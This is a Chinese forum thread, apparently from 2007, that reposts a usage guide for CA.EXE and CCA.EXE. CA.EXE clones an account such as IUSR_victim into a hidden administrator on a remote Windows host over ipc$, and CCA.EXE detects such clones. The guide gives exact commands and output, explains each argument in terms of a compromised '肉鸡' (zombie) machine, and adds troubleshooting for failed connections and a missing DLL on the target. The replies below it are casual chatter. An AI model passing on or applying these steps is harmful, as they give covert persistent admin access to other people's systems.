克隆admin!CA.EXE使用方法
利用SA.exe 将Iusr_victim克隆为Administrator。C:\>ca \\192.168.0.1 test test iusr_victim password
Clone Administrator, by netXeyes 2002/04/06
Written by netXeyes 2002, [email]dansnow@21cn.com[/email]
Connect 192.168.0.1 ....OK
Get SID of iusr_victim ....OK
Prepairing ....OK
Processing ....OK
Clean Up ....OK
这时,iusr_victim就成为了超级用户,并有具有和Administrator同样的设置(桌面、菜单等等)。
注:在ca \\192.168.0.1 test test iusr_victim password 中,
192.168.0.1是肉鸡的IP地址;第一个test是你已经得到的肉鸡上的管理员用户名,第二个test是这个用户名的密码;iusr_victim是你想克隆的帐号,最后这个password就是你想给iusr_victim用的密码。
-------------------------------------------------------
用CCA.EXE检查是否存在克隆的帐号。
不必改变ACL, 支持远程检查。
C:\>cca \\192.168.0.29 administrator 123456
Check Clone Account, by netXeyes 2002/04/29
Written by netXeyes 2002, [email]dansnow@21cn.com[/email]
Connect 192.168.0.29 ....OK
Prepairing ....OK
Processing ....OK
Checking ....
Check Result:
[DuDu] AS SAME AS [administrator]
[Guest] AS SAME AS [administrator]
[IUSR_RONG] AS SAME AS [administrator]
[IWAM_RONG] AS SAME AS [administrator]
[TEST] AS SAME AS [administrator]
[xr] AS SAME AS [administrator]
[Guest] AS SAME AS [DuDu]
[IUSR_RONG] AS SAME AS [DuDu]
这上面的DuDu,guest,IUSR_RONG等帐户就已经是被克隆为administrator啦
注意删除克隆账户是小心一定注意。我试验过很多机子删除之后administrator账户不再超管组
其实可隆帐号就是利用命名管道来把sam文件重置一份,前提是要对方的netbios端口,NETBEUI协议都装了,而且ipc$,admin$都要开着~~
我记得还有在注册表下修改用户的SID也可以的,只要把所要可隆的帐号的SID改成已知的那个号的SID 具体自己到网上找~~
1,使用ca时,出现connect **.**.**.** ...Error是怎么会事?
答:ca和cca需要目标开放ipc$,请确认可以与目标建立ipc$。参见“关于ipc$和空连接”
2,使用ca时,出现“Processing....ERROR”是怎么会事?
答:这说明对方主机缺少文件msvcp60.dll,想办法传个过去放在系统目录下就可以了。
3,克隆过程没有错误,但cca没有显示该帐号克隆成功,无法使用被克隆的帐号。 有字天书~~~~~~~~ [quote]原帖由 [i]~~飘~~[/i] 于 2007-7-5 01:05 发表 [url=http://www.gdin.net/redirect.php?goto=findpost&pid=443035&ptid=27791][img]http://www.gdin.net/images/common/back.gif[/img][/url]
有字天书~~~~~~~~ [/quote]
我都觉…………[s:30] [s:30] [s:30] 哈哈~~~~~~~扼下手先 [quote]原帖由 [i]~~飘~~[/i] 于 2007-7-5 12:53 发表 [url=http://www.gdin.net/redirect.php?goto=findpost&pid=443144&ptid=27791][img]http://www.gdin.net/images/common/back.gif[/img][/url]
哈哈~~~~~~~扼下手先 [/quote]
呵呵………………[s:38] [s:38] [s:38] [quote]原帖由 [i]fanfan[/i] 于 2007-7-5 13:03 发表 [url=http://www.gdin.net/redirect.php?goto=findpost&pid=443151&ptid=27791][img]http://www.gdin.net/images/common/back.gif[/img][/url]
呵呵………………[s:38] [s:38] [s:38] [/quote]
俺是你师姐来的,你这啥表情~~~~~~~~快叫师姐,哈哈~~~~ 看不懂。
页:
[1]